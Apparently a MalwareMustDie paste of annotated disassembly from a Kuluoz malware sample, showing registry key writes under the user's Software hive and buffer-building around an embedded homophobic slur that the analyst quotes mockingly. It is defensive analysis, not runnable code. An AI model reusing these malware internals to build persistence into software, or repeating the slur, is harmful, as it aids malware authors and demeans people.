- 0x0D6F69 push ecx
- 0x0D6F6A mov edx, dword ptr [ebp-24h]
- 0x0D6F6D push edx
- 0x0D6F6E push 00000003h
- 0x0D6F70 push 00000000h
- 0x0D6F72 mov eax, dword ptr [ebp-1Ch]
- 0x0D6F75 push eax
- 0x0D6F76 mov ecx, dword ptr [ebp-10h]
- 0x0D6F79 push ecx
- 0x0D6F7A call dword ptr [0x0DE01Ch] RegSetValueExA@ADVAPI32.DLL [6 Params]
- 0x0D6F80 test eax, eax
- 0x0D6F82 jne 0x0D6F88h target: 0x0D6F88
- 0x0D6F84 mov byte ptr [ebp-15h], 00000001h
- 0x0D6F88 mov edx, dword ptr [ebp-10h] xref: 0x0D6F82
- 0x0D6F8B push edx
- 0x0D6F8C call dword ptr [0x0DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- // The typical Kuluoz:
- // "You fag!!!!!"buff :-))
- 0x8D633A push 008DE774h ASCII "Software\"
- 0x8D633F mov edx, dword ptr [ebp-00000230h]
- 0x8D6345 push edx
- [...]
- 0x8D6787 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D678D mov dword ptr [ebp-08h], eax
- 0x8D6790 push 00001000h
- 0x8D6795 push 00000000h
- 0x8D6797 mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D679D push ecx
- 0x8D679E call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D67A4 mov dword ptr [ebp-10h], eax
- 0x8D67A7 push 0x8DEF44h ASCII "You fag!!!!!"
- 0x8D67AC mov edx, dword ptr [ebp-08h]
- 0x8D67AF push edx
- 0x8D67B0 call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x8D67B6 add esp, 08h
- 0x8D67B9 mov eax, dword ptr [ebp+10h]
- 0x8D67BC push eax
- 0x8D67BD call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D67C3 add esp, 04h
- 0x8D67C6 push eax
- 0x8D67C7 mov ecx, dword ptr [ebp+10h]
- 0x8D67CA push ecx
- 0x8D67CB push 0x8DEF54h ASCII "You fag!!!!!"
- 0x8D67D0 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D67D6 add esp, 04h
- 0x8D67D9 add eax, 01h
- 0x8D67DC push eax
- 0x8D67DD mov edx, dword ptr [ebp-10h]
- 0x8D67E0 push edx
- 0x8D67E1 mov eax, dword ptr [ebp-08h]
- 0x8D67E4 push eax
- 0x8D67E5 call 0x8D1E10h target: 0x8D1E10
- 0x8D67EA add esp, 14h
- 0x8D67ED mov ecx, dword ptr [ebp+18h]
- 0x8D67F0 push ecx
- 0x8D67F1 mov edx, dword ptr [ebp+14h]
- 0x8D67F4 push edx
- 0x8D67F5 push 0x8DEF64h ASCII "You fag!!!!!"
- 0x8D67FA call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D6800 add esp, 04h
- 0x8D6803 mov ecx, dword ptr [ebp-10h]
- 0x8D6806 lea edx, dword ptr [ecx+eax+01h]
- 0x8D680A push edx
- 0x8D680B call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x8D6811 add esp, 0Ch
- 0x8D6814 push 0x8DEF74h ASCII "You fag!!!!!"
- 0x8D6819 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D681F add esp, 04h
- 0x8D6822 mov ecx, dword ptr [ebp+18h]
- 0x8D6825 lea edx, dword ptr [ecx+eax+01h]
- 0x8D6829 mov dword ptr [ebp-14h], edx
- 0x8D682C lea eax, dword ptr [ebp-04h]
- 0x8D682F push eax
- 0x8D6830 mov ecx, dword ptr [ebp+08h]
- 0x8D6833 push ecx
- 0x8D6834 push 80000001h
- 0x8D6839 call dword ptr [0x8DE020h] RegOpenKeyA@ADVAPI32.DLL [3 Params]
- 0x8D683F test eax, eax
- 0x8D6841 jne 0x8D686Fh target: 0x8D686F
- 0x8D6843 mov edx, dword ptr [ebp-14h]
- 0x8D6846 push edx
- 0x8D6847 mov eax, dword ptr [ebp-10h]
- 0x8D684A push eax
- 0x8D684B push 00000003h
- 0x8D684D push 00000000h
- 0x8D684F mov ecx, dword ptr [ebp+0Ch]
- 0x8D6852 push ecx
- 0x8D6853 mov edx, dword ptr [ebp-04h]
- 0x8D6856 push edx
- 0x8D6857 call dword ptr [0x8DE01Ch] RegSetValueExA@ADVAPI32.DLL [6 Params]
- 0x8D685D test eax, eax
- 0x8D685F jne 0x8D6865h target: 0x8D6865
- 0x8D6861 mov byte ptr [ebp-09h], 00000001h
- 0x8D6865 mov eax, dword ptr [ebp-04h] xref: 0x8D685F
- 0x8D6868 push eax
- 0x8D6869 call dword ptr [0x8DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- # To be added, maybe..
- ---
- #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement